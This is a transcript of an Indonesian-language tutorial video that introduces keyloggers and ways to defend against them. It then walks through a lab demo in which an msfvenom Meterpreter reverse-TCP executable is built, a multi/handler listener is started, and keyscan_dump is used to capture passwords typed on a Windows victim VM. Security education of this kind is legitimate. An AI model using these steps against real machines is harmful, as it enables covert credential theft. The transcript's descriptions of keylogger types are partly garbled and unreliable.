Halo teman-teman semua, kembali lagi bersama gua Yogi. Di sini gua mau mengucapkan terima kasih banyak buat teman-teman semua yang sudah mau support gua sampai dengan sekarang dan sudah mau mengikuti video gua dari awal sampai dengan sekarang. Ya teman-teman, jangan lupa di-subscribe dan kali ini kita bakal belajar apa? Kita bakal belajar pengenalan terkait keylogger. Apa sih keylogger itu? Nanti kita bakal bahas dan masuk ke dalam materi. Dan jangan lupa video ini jangan di-skip karena nanti kita bakal mencoba untuk implementasinya bagaimana cara kerja keylogger ya teman-teman untuk keamanan kalian sendiri. Oke, kita lanjut aja ke dalam materinya. Apa sih keylogger? Keylogger adalah metode peretasan yang dilakukan dengan cara merekam aktivitas keyboard secara diam-diam. Serangan ini berbentuk spyware atau perangkat lunak berbahaya yang biasanya dilampirkan pada email. Jika spyware terpasang pada komputer, maka hacker bisa merekam setiap keystroke pada keyboard perangkat komputer tersebut. Keylogger merupakan aktivitas hacking berbahaya yang harus diwaspadai. Data-data yang berhasil dikumpulkan dari perekaman keyboard memungkinkan penyerang mendapatkan informasi penting dan sensitif, misalnya akun sosial media, Bitcoin, m-banking, dan lain-lain pokoknya dan sebagainya seperti itu ya teman-teman. Dan keylogger juga tidak dikirim melalui email, tetapi juga bisa berbentuk aplikasi, terus ekstensi, dan lain-lain sih. Banyak lah pokoknya untuk cara kerja si keylogger. Oke, kita langsung aja next. Yaitu, apa sih jenis-jenis keylogger yang biasanya si hacker gunakan itu untuk mencuri data ataupun memasang backdoor untuk merekam apapun yang dilakukan kalian ketika mengetik sebuah keyboard. Yang pertama ada namanya itu packet analyzer. Merupakan spyware yang paling mudah dan sering digunakan. Sebagai salah satu jenis keylogger, packet analyzer mampu merekam seluruh aktivitas keyboard serta menangkap trafik jaringan yang sudah terkait dengan HTTP post teman-teman seperti itu. Selanjutnya, spyware ini akan mencuri informasi-informasi penting sekaligus kata sandi yang terenkripsi seperti itu ya. Terus yang kedua ada spyvisor. Sama seperti jenis keylogger pada umumnya, hypervisor merupakan perangkat lunak berbahaya yang fungsinya untuk merekam seluruh keystroke pada keyboard komputer. Contoh hypervisor yang paling populer adalah Bluepill dan AMDV teman-teman seperti itu. Terus yang ketiga ada namanya spyware kernel based. Spyware berbasis kernel merupakan jenis keylogger yang sangat powerful. Spyware ini sering digunakan oleh para peretas handal dan berpengalaman. Spyware kernel based menjadi sulit dilawan karena keberadaan kernel itu sendiri cukup sulit dideteksi pada perangkat komputer. Nah, selanjutnya ada namanya keylogger IP keyboard, teman-teman. Apa sih keylogger IP keyboard? Merupakan spyware yang menempel dan bekerja sama dengan sistem operasi, sama seperti keylogger lain. Cara kerja spyware satu ini adalah merekam dan mencatat semua ketikan pada tombol keyboard korban secara otomatis. Contoh spyware IP keyboard yang cukup terkenal yaitu namanya Get Asynchronous Keystat dan Get Forget Windows, teman-teman seperti itu. Selanjutnya yaitu ada namanya spyware formulir. Berbeda dengan jenis keylogger ini, spyware formulir hanya mencatat dan data melalui formulir yang dikirimkan penyerang. Metode serangan ini dilakukan dengan cara merekam fungsi pengiriman pada situs web. Oleh sebab itu, data atau informasi yang dihasilkan pun berupa enkripsi bahasa HTTPS, teman-teman, seperti itu. Selanjutnya, bagaimana sih cara menghindari untuk serangan keylogger? Yang pertama yaitu menerapkan two-factor authentication, teman-teman. Metode keamanan two-factor authentication merupakan langkah perlindungan ganda untuk melindungi keamanan akun. Untuk bisa masuk ke dalam sistem, kamu harus memasukkan sebuah kode unik yang dikirimkan oleh sistem itu sendiri sebagai autentikasi tambahan. Udah banyak sih sebenarnya untuk penerapan two-factor authentication itu seperti email dan lain-lain lah. Teman-teman bisa biasanya menggunakan aplikasi, biasanya itu menggunakan two-factor authentication kayak Facebook itu udah menggunakan itu ya. Karena emang rentan sekali kalian tuh kena phishing. Jadi ya itu ya digunanya untuk two factor authentication seperti itu teman-teman. Yang kedua yaitu kita akan melakukan update. Software versi terbaru tentu melakukan patch keamanan yang lebih kuat dari versi sebelumnya. Sistem keamanan terus dikembangkan agar perangkat lunak tidak mudah terkena serangan cyber, dan ini udah gua sampaikan di semua video gua untuk masalah update patch teman-teman ya. Itu penting banget maupun itu di Android ataupun di laptop gitu ya, seperti itu. Yang ketiga yaitu ada namanya memperkuat password. Kamu dapat memperkuat password dengan cara mengkomunikasikan huruf kapital, huruf kecil, simbol, dan angka. Gunakan karakter yang panjang agar tidak mudah diprediksi oleh peretas. Untuk memperkuat password itu fungsinya, jika teman-teman laptopnya itu ditinggal,
dan itu tidak ada orang yang bisa masuk ke dalam komputer kalian. Dan takutnya ada orang jahat tiba-tiba mengotak-atik komputer kalian dan memasang backdoor dalam komputer kalian. Seperti itu fungsinya ya teman-teman. Selanjutnya yaitu menggunakan software anti spyware dan keylogger teman-teman. Program atau software anti spyware akan membantu mendeteksi hingga membersihkan perangkat dari keylogger hacking. Selama keylogger tersebut berbentuk perangkat lunak, penggunaan anti spyware sangat efektif dalam menjaga komputer ataupun perangkat komputer kalian. Seperti itu ya. Ini adalah beberapa tools yang teman-teman bisa ataupun cara yang teman-teman bisa menghindari terkait serangan keylogger, dan kembali lagi terhadap psikologi manusianya sendiri sih. Nah, ini adalah kesimpulannya. Keylogger adalah salah satu metode peretasan yang dilakukan dengan cara merekam seluruh aktivitas default secara diam-diam. Peretasan bertujuan untuk mencuri data dan akun sosial media, e-banking, bitcoin, dan lain sebagainya. Kamu dapat meminimalisir serangan keylogger dengan beberapa cara, diantaranya yaitu yang pertama ya menerapkan keamanan, kedua melakukan update patch, yang ketiga ya memperkuat kata sandi, yang keempat ya menggunakan software anti spyware, ataupun bisa juga menggunakan ya software antivirus teman-teman. Seperti itulah, itu untuk mendeteksi serangan di dalam komputer kalian. Itu oke ya, mungkin cukup sampai sini aja untuk pengenalan keylogger. Untuk cara kerjanya kita bakal langsung implementasinya bagaimana cara kerja si keylogger gitu ya. Oke teman-teman, silakan buka VirtualBox ya. Sini gue udah buka VirtualBox-nya. Jika teman-teman belum menginstal VirtualBox ataupun Kali Linux di dalam VirtualBox-nya, silakan teman-teman install terlebih dahulu dan pastikan kalian menonton video gue di sebelumnya bagaimana cara untuk menginstal Kali Linux di dalam VirtualBox. Gitu teman-teman ya. Kita coba start untuk Metasploitnya. Terus yang kedua, ini kita jalankan juga untuk targetnya yaitu Windows seperti itu. Nah, oke. Extension yang kita lakukan nanti kan kita bakal ngebuat sebuah aplikasi, dan di dalam aplikasinya itu kita bisa ya mengontrol apapun yang diketikkan. Bagaimana caranya nanti gue tunjukin ya teman-teman. Ini kita coba untuk melakukan running terlebih dahulu di dalam dua server yang sudah gue buat. Yang pertama yaitu dari sisi si hacker, dan kedua yaitu dari sisi si target. Oke, ini kita udah muncul teman-teman. Kita tunggu dulu beberapa saatnya sampai dengan selesai. Ini juga kita sedang loading. Oke teman-teman, nah ini udah muncul logo Kali Linux-nya, dan ini juga masih loading aja untuk Windows servernya. Ya kita harap bersabar aja ya teman-teman, dan jangan lupa di subscribe ya. Semoga video ini bermanfaat. Terima kasih banyak ya teman-teman yang sudah mengikuti gue dari awal dan sudah subscribe juga, terima kasih ya. Semoga video-video yang apapun itu yang udah gue buat ya itu bisa bermanfaat buat kalian sih. Itu aja. Oke, kita masukkan dulu Kali Linux kita. Ya mungkin kalau teman-teman bisa nonton ini yang barusan nonton video gue, ya diusahakan nonton video gue dari awal sih, jadi lebih paham gitu, dibandingkan langsung nonton video ini kemungkinan bakal sedikit bikin kepala kalian pusing. Seperti itu ya. Selanjutnya kita bakal cek IP-nya dulu, habis itu kita bakal remote biar bisa copy paste gitu. Keuntungannya seperti itu ya. Oke bentar, kita perbesar terlebih dahulu. Oh nggak usah lah, ntar aja kita perbesar. Oke, kita cek dulu 167 teman-teman. Oke, kita masuk ke dalam remote desktop. Ini aduh apa sih? Bentar. 2 1 nomor waduh 0 167. Oke, kita konekin teman-teman. Pakai ini udah selesai juga untuk Windows servernya. Masih loading teman-teman, kita tunggu dulu. Ini oke. Nah ini nggak bisa, jadi kita harus lockout dulu. Oke, 167 ya benar. Kita harus lockout dulu baru bisa kita masuk ke dalam remote desktop ya teman-teman. Karena nggak bisa itu masuk ke tabrakan user. Oke, nah ini bisa kan, kita langsung masuk aja.
Oke, kita masukin username dan passwordnya. Oke, ini udah berhasil. Terus kita masuk ke dalam nih. Ini udah kebuka juga untuk Windows Server dari sisi targetnya. Oke, kita tunggu dulu beberapa saat. Kita klik CMD, teman-teman, kalau untuk melihat IP-nya. Oke, ini lagi loading nggak? Cukup berat banget. Oke, seharusnya bisa ya. Oke, ini udah bisa, udah masuk sih. Nah, ini udah berhasil masuk. Kita buka si komen Linux-nya. Bentar. Nah, ini udah berhasil. Oke, kita tunggu dulu. Wow, sabar ya teman-teman, sorry. Ini agak cukup berat juga karena menjalankan dua server sekaligus. Oke, kita tunggu dulu. Kita cek dulu. Oke, 227 227. tujuh. Oke, kita masuk dulu teman-teman. Kita berhasil. Nah, ini kita perbesar dulu sekalian. Ctrl Shift plus plus. Nah, ini kita perbesar biar kelihatan ya teman-teman. Ini kayaknya gagal deh. Kocak. 0227 kan bener. Oh, ini bisa nih. Seharusnya bisa ya. Oke, bisa ya teman-teman. Silakan kalian masukkan username dan passwordnya si Windows Server. Oke, ini udah berhasil masuk kedua servernya teman-teman. Kita berhasil ride mode. Selanjutnya kita langsung setting aja untuk pembuatan aplikasinya. Kita di sini menggunakan Metasploit teman-teman. Oke, kita masuk ke mode root terlebih dahulu. Oke, ini kita udah berhasil mode root. Kita coba hapus dulu. Terus kita MSV Venom. Nah, ini ya teman, MSV Venom min P. Sorry. Min P Windows X. Ya, Windows X64 MetaPredator, reverse TCP lhost. Oke, kita tab dulu. Nggak mau lhost terus 92.168.0.167 lport sama dengan 4444. Terus apa ya, bentar ya, lport 4444. Gue lupa teman-teman, bentar ya. min F. Oke, ini kita ikutin dulu, ntar kita ganti ya, gue agak lupa. Ini lport sama dengan 4444 min F. Ini kalau untuk port ya teman-teman terserah ya, tapi kalau untuk IP ya pastikan IP-nya sama gitu teman-teman. Oke, ini perbesar. Ini kita pakai extensionnya XC 0 min O terus keylogger 2 karena gue udah pernah buat untuk implementasi apakah itu berhasil atau tidak gitu ya. Nah, ini silakan teman-teman ganti ke, nah kita enter aja. Ini bakal ngebuat aplikasi dari si MSV Venom ya teman-teman. Kita tunggu dulu dari MetaPredator. Dia bakal ngebuat pilot dan itu nanti kita bakal gunakan. Ya, ini videonya hampir sama-sama dengan yang kemarin, tapi untuk konsep cara kerjanya itu berbeda ya teman-teman. Oke. Nah, ini udah berhasil ya teman-teman. Terus kita masuk ke dalam kita masuk ke dalam MSV. Kita daftarin dulu aja konsol teman-teman. Enter.
Oke, dia bakal loading ataupun starting. Kita tunggu dulu beberapa saat. Kita tunggu dulu beberapa saat. Nah, ini teman-teman udah berhasil ya. Kita udah masuk ke dalam MSV konsolnya ya kan. Kita tunggu dulu sampai runningnya selesai. Habis itu baru kita setting lagi di dalamnya teman-teman. Setelah itu kita bakal ngelempar aplikasi ini langsung ke dalam si targetnya. Tapi ini gue tidak menggunakan web server, tapi langsung gue copy paste aja ke dalam server biar cepat. Dan nanti kalau misalnya menggunakan web server juga gue udah ngasih tahu sih itu ke teman-teman. Dan gue juga udah pernah buat itu menggunakan Apache gitu ya teman-teman. Silakan copy ke file HTML teman-teman dari si web servernya dan itu kalian akses aja ke dalam situ gitu. Seperti itu ya. Selanjutnya yaitu gua Ctrl L dulu, habis itu untuk bersihin dulu biar terlihat jelas. Terus selanjutnya kita masuk ke dalam use. Oke bentar, gua agak sedikit lupa. Iya, ya. Use exploit multi handler. Kita masuk ke dalam. Oke, ini salah. Exploit, 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 exploit. Salah teman-teman, sorry. Exploit nggak pakai e ya. Exploit, bentar, bagaimana sih exploit? Ya bener ya, exploit, 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 exploit teman-teman, seperti ini. Exploit ini ya, sebenarnya sih ini exploit multi handler. Nah ini teman-teman, kita udah masuk ke dalam si exploitnya multi handler. Terus selanjutnya kita silakan show option, kita cek dulu. Nah ini teman-teman, ini kita belum daftarkan untuk current settingnya dan yang bakal jadi targetnya gitu teman-teman. Selanjutnya yaitu kita masukkan di sini namanya oke bentar, gue lupa lagi anjay. Bentar ya, oh ini ada set teman-teman, kalian langsung lakukan. Oke bener gue ya, bisa ya. Ini gue kontrol dulu aja. Set pilot ini hampir sama yang ini. Aduh gue ini aja deh, langsung aja, sorry, yang cepet lah ya, hampir sama dengan settingan awal. Nih set pilot Windows X64 Meterpreter reverse TCP teman-teman. Oke kita enter aja. Selanjutnya kita setting lhost. Oke. Oh nggak bisa, ini harus pakai sama dengan ya teman-teman. Command formal detail lhost. Oh sorry teman-teman, kita harus setting dulu. Set lhost. Oke ini nggak. Oke kita clear dulu sebentar teman-teman. Ini kita seperti ini sih seharusnya. Nah ini teman-teman berhasil. Terus set lport nggak pakai bersama dengan. Oke. Selanjutnya kita cek lagi show option apakah sudah berhasil. Nah ini udah berhasil ya teman-teman. Selanjutnya yaitu kita lakukan yaitu exploit. Jalankan exploit teman-teman. Oke. Ini sekalian running. Sabar, kita tunggu dulu sampai dengan running ya teman-teman. Oke kita tunggu dulu beberapa saat. Sekalian kita menunggu ini, kita coba copy paste ya teman-teman. Teman-teman silahkan pergi ke open folder. Nah ini tinggal nunggu si target terbuka. Oke, open folder, masuk ke dalam keylogger extension X2. Kita copy aja. Terus kita taruh ke dalam oke, desktop aja teman-teman ya. Kita taruh ke dalam, aduh sorry ini nggak bisa, ini ke sini. Nah ini udah berhasil ya teman-teman, sorry. Kita copy ke sini teman-teman, paste aja langsung. Nah ini jadi drawing tadi gue udah coba implementasi. Sebelum gue buat video ini pasti gue belajar dulu. Selanjutnya yaitu kita buka aja langsung. Oke ini gue perkecil aja ya. Kita perkecil. Terus kita bagi dengan seperti biasa, kita bagi dengan si kali Linux ya. Kita buka command line-nya lagi di sini. Oke.
sekalian nunggu apakah ini berhasil masuk. Seharusnya berhasil ya. Ini kita udah berapa kali coba. Nah teman-teman, kita tunggu dulu. Nah ini ya, oke, kita lihat aja teman-teman. Ketika si user buka aplikasi ini, extension ini, ya otomatis kita bakal bisa meremote ya teman-teman. Oke, ini kita udah berhasil buka. Nah ini Metapletter season 1. Nah ini adalah targetnya, kita udah berhasil masuk ke dalamnya. Selanjutnya apa yang bisa kita lakukan? Oke, bentar. Aduh, ini susah ya. Gimana caranya? Oke. Gini aja ya. Gua buka file explorer dulu. Kita udah berhasil masuk ya teman-teman. Bentar. Kita udah berhasil masuk ke dokumen. Oke, ke dokumen. Bisa nggak? Gua kecil lagi. Nah, bisa lah ya. Oke, di sini lah ya. Cukup lah ya kelihatan ya. Nah, oke. Selanjutnya yang kita butuhkan yaitu, lupa, gua ke help dulu. Ke help, terus gua butuhkan itu yang namanya oh ya, oke. Ini gua Ctrl L, key scan start. Nah teman-teman, dia bakal merunning setiap targetnya itu mengetikkan apapun. Kita coba buat file di sini, extensionnya text dokumen, terus tes, kita buat tes ya kan. Selanjutnya kita coba edit di dalamnya. Misalnya di sini, halo, nama saya Muhammad Yogi. Password e-banking saya 02. Ini ya teman-teman ya, contoh lah seperti ini ya. Oke, terus password Facebook saya nih, teman-teman bisa perhatikan. Oke, gini lah ya, seperti ini. Nah ini gua save, Ctrl S file teksnya. Oke, ini gua save. Oke ya, gua save. Nah, si hacker itu bisa nge-scan dari hasil kalian mengetik apapun di dalam keyboard. Contohnya seperti ini. Scan dump. Nah, ini teman-teman. Kita bisa ngelihat nih caps lock, nama saya Muhammad Yogi. Walaupun tidak jelas tapi seperti ini ya, kita bisa membacanya. M-banking saya tuh 0231 1242. Oke. Ini sepertinya salah ya. 12312. Oh benar, 12. Oke, ini ada kekurangan dari si ini sih. Oke. Enggak. Ini kayaknya dia cuma menyekan 123 haha. 123 124 1242. Oh, dia tidak bisa. Jadi gini teman-teman ya, dia nggak bisa. Ini kekurangan dari si Metasploit. Kemungkinan gue belum coba yang lain. Coba kita juga bentar-bentar, kita cek dulu di atas. Bentar ya. Ini kekurangan si Metasploit seperti ini. Keyboard. Nah, key scan start. Oh, ini start dan benar. Key scan keyboard send key event. Oke, nggak usah. Oke. Kekurangan si Metasploit, dia tidak bisa menggunakan karakter yang double teman-teman, seperti itu, ataupun huruf yang double. Contoh seperti ini ya. Gue lagi ya. 002531 kosong. 254. Gue coba seperti ini. Coba kita dump, key scan dump. Nah teman-teman, seperti ini 00. Oke, hasilnya itu di bawah. Hasilnya teman-teman, dia bakal menerjemahkan terlebih dahulu atau men-tracking apakah ini sesuai apa tidak. Habis itu barusan dia bakal menghasilkan karakteristik yang di bawah itu, kata-kata ini teman-teman, seperti ini ya. Seharusnya ini 123 nih, 02312 424 ini ya jangan dihiraukan, karena ini emang translate si Metapleternya. Bosannya menyimpulkan dia akan mengenkripsi ataupun ya menerjemahkan si kekurangan itu di belakangnya teman-teman. 123 seperti itu. Coba kita lagi apa ya, password Instagram coba babuying
52312. Coba kita key scam dam lagi. Key scan underscore dam. Password Instagram babuing. Oke teman-teman ya. Akurat ya, 2313212 kan benar. Ini cukup akurat karena dia menerjemahkan ini seperti HTML, tapi gue nggak tahu bahasanya pakai CR atau pakai CR. Oke, seperti itulah ya teman-teman. Inilah bahayanya keylogger teman-teman. Apapun yang kita lakukan di dalam pekerjaan kita, dalam keyboard kita, itu bisa terekam secara otomatis gitu teman-teman. Kalau misalnya kita sudah meretasnya gitu teman-teman. Bagaimana cara mengatasinya? Silahkan kalian, tadi gue udah sampaikan di materi untuk menghindarinya. Dan contoh kecil aja teman-teman, jangan lupa hidupkan firewall ataupun antivirus teman-teman. Nanti gue bakal ngebahas bagaimana cara menghindari serangan dari Metasploit ataupun virus-virus yang udah gue buat ataupun video-video yang gue buat tentang hacking itu bagaimana cara menghindarinya. Nanti gue bakal buat sesinya teman-teman, seperti itu ya. Mungkin itu aja yang bisa gue sampaikan, dan ini cukup berbahaya, dan hati-hati ke teman-teman semua untuk menggunakan alat komputer teman-teman itu secara ya aman gitu, tidak digunakan secara sembarangan ataupun ditaruh sembarangan, ataupun kalian tidak peduli terkait awareness ya security kalian sendiri gitu. Oke, itu aja yang bisa gue sampaikan sebelum kalian nanti terkena dampaknya ataupun kehilangan banking. Itu udah berbahaya banget ya. Seperti itu kalau misalnya udah tahu. Ya, kalau misalkan si hacker itu udah tahu terkait password dan username kalian, banking yang kalian targetin itu satu, yang si hacker targetin, si hacker target itu cuma satu teman-teman. Bagaimana dia bisa mendapatkan OTP, ya kan? OTP dari si bankingnya seperti itu. Kalau misalnya kalian sudah menyerahkan OTP-nya, otomatis ya bakal kebobolan. Itulah ya teman-teman berbahayanya seperti itu. Dan satu lagi, jangan mudah untuk dirayu apapun itu. Oke, contoh misalnya ya gue udah sampaikan lah di video-video gue terkait rayuan-rayuan yang biasa digunakan untuk penipuan gitulah, seperti itu ya. Itu mungkin itu aja yang bisa gue sampaikan. Semoga bermanfaat, dan jangan lupa di subscribe dan tonton video ini sampai dengan selesai. Oke, terima kasih. See you and enjoy teman-teman. Bye bye. And happy learning.